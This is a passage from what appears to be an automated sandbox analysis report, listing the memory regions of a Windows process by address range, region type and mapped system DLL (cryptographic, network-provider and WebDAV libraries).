"pagefile_0x0000000001e30000" filename = "" Region: id = 316 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 317 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 318 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 319 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 320 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 321 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 322 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 323 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 324 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 325 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 326 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 327 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 328 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 329 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 330 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 331 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 332 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 333 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 334 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 335 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 336 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 337 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 338 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 339 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 340 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 341 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 342 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 343 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 344 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 345 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 346 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 347 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 348 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 349 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 350 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 351 start_va = 0x1e30000 end_va = 0x1e37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 352 start_va = 0x1e10000 end_va = 0x1e10fff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 353 start_va = 0x743c0000 end_va = 0x743d2fff entry_point = 0x743c0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 354 start_va = 0x743a0000 end_va = 0x743bafff entry_point = 0x743a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 355 start_va = 0x74370000 end_va = 0x7439efff entry_point = 0x74370000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 356 start_va = 0x1e30000 end_va = 0x1e30fff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 357 start_va = 0x1e40000 end_va = 0x1e40fff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 358 start_va = 0x1e40000 end_va = 0x1e40fff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 359 start_va = 0x1e50000 end_va = 0x1e50fff entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 360 start_va = 0x1e60000 end_va = 0x1e69fff entry_point = 0x1e60000 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 361 start_va = 0x2300000 end_va = 0x2474fff entry_point = 0x2300000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 362 start_va = 0x1e60000 end_va = 0x1e60fff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 363 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 364 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 365 start_va = 0x1e50000 end_va = 0x1e50fff entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 366 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 367 start_va = 0x1e80000 end_va = 0x1e81fff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 368 start_va = 0x1e50000 end_va = 0x1e50fff entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 369 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 370 start_va = 0x1e90000 end_va = 0x1e90fff entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 371 start_va = 0x1ea0000 end_va = 0x1ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 372 start_va = 0x1ea0000 end_va = 0x1ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 373 start_va = 0x2300000 end_va = 0x2300fff entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 374 start_va = 0x2300000 end_va = 0x2302fff entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 375 start_va = 0x1e70000 end_va = 0x1e70fff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 376 start_va = 0x1e90000 end_va = 0x1e90fff entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 377 start_va = 0x2310000 end_va = 0x234ffff entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 378 start_va = 0x2350000 end_va = 0x244ffff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 379 start_va = 0x7fead000 end_va = 0x7feaffff entry_point = 0x0 region_type = private name = "private_0x000000007fead000" filename = "" Region: id = 380 start_va = 0x1ea0000 end_va = 0x1ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 381 start_va = 0x2450000 end_va = 0x2450fff entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 382 start_va = 0x2460000 end_va = 0x249ffff entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 383 start_va = 0x24a0000 end_va = 0x259ffff entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 384 start_va = 0x25a0000 end_va = 0x25a0fff entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 385 start_va = 0x7feaa000 end_va = 0x7feacfff entry_point = 0x0 region_type = private name = "private_0x000000007feaa000" filename = "" Region: id = 386 start_va = 0x25b0000 end_va = 0x25b1fff entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 387 start_va = 0x74350000 end_va = 0x74366fff entry_point = 0x74350000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 388 start_va = 0x25c0000 end_va = 0x25c0fff entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 389 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 390 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 391 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 392 start_va = 0x25e0000 end_va = 0x25e0fff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 393 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 394 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 395 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 396 start_va = 0x25e0000 end_va = 0x25e0fff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 397 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 398 start_va = 0x25e0000 end_va = 0x25e0fff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 399 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 400 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 401 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 402 start_va = 0x25e0000 end_va = 0x25e0fff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 403 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 404 start_va = 0x25e0000 end_va = 0x25e0fff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 405 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 406 start_va = 0x25e0000 end_va = 0x25e0fff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 407 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 408 start_va = 0x25e0000 end_va = 0x25e0fff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 409 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 410 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 411 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 412 start_va = 0x25e0000 end_va = 0x25e0fff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 413 start_va = 0x25f0000 end_va = 0x25f0fff entry_point = 0x25f0000 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mpr.dll.mui") Region: id = 414 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 415 start_va = 0x25e0000 end_va = 0x25e0fff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 416 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 417 start_va = 0x25e0000 end_va = 0x25e0fff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 418 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 419 start_va = 0x25e0000 end_va = 0x25e0fff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 420 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 421 start_va = 0x25e0000 end_va = 0x25e0fff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 422 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 423 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 424 start_va = 0x25e0000 end_va = 0x25e0fff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 425 start_va = 0x2600000 end_va = 0x2600fff entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 426 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 427 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 428 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 429 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 430 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 431 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 432 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 433 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 434 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 435 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 436 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 437 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 438 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 439 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 440 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 441 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 442 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 443 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 444 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 445 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 446 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 447 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 448 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 449 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 450 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 451 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 452 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 453 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 454 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 455 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 456 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 457 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 458 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 459 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 460 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 461 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 462 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 463 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 464 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 465 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 466 start_va = 0x74340000 end_va = 0x74348fff entry_point = 0x74340000 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: "c:\\windows\\syswow64\\drprov.dll") Region: id = 467 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 468 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 469 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 470 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 471 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 472 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 473 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 474 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 475 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 476 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 477 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 478 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 479 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 480 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 481 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 482 start_va = 0x742f0000 end_va = 0x74333fff entry_point = 0x742f0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 483 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 484 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 485 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 486 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 487 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 488 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 489 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 490 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 491 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 492 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 493 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 494 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 495 start_va = 0x2620000 end_va = 0x2620fff entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 496 start_va = 0x2620000 end_va = 0x2620fff entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 497 start_va = 0x2620000 end_va = 0x2720fff entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 498 start_va = 0x2730000 end_va = 0x2830fff entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 499 start_va = 0x742d0000 end_va = 0x742e1fff entry_point = 0x742d0000 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 500 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 501 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 502 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 503 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 504 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 505 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 506 start_va = 0x2620000 end_va = 0x2620fff entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 507 start_va = 0x2620000 end_va = 0x2620fff entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 508 start_va = 0x2620000 end_va = 0x2720fff entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 509 start_va = 0x2730000 end_va = 0x2830fff entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 510 start_va = 0x742b0000 end_va = 0x742c9fff entry_point = 0x742b0000 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 511 start_va = 0x742a0000 end_va = 0x742aafff entry_point = 0x742a0000 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 512 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 513 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 514 start_va = 0x25d0000 end_va = 0x25d0fff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 515 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 516 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 517 start_va = 0x2610000 end_va = 0x2610fff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 518 start_va = 0x2620000 end_va = 0x2621fff entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 519 start_va = 0x2620000 end_va = 0x2621fff entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 520 start_va = 0x74290000 end_va = 0x7429ffff entry_point = 0x74290000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 521 start_va = 0x2630000 end_va = 0x2630fff entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 522 start_va = 0x2630000 end_va = 0x2630fff entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 523 start_va = 0x2630000 end_va = 0x2730fff entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 524 start_va = 0x2740000 end_va = 0x2840fff entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 525 start_va = 0x74280000 end_va = 0x7428efff entry_point = 0x74280000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: 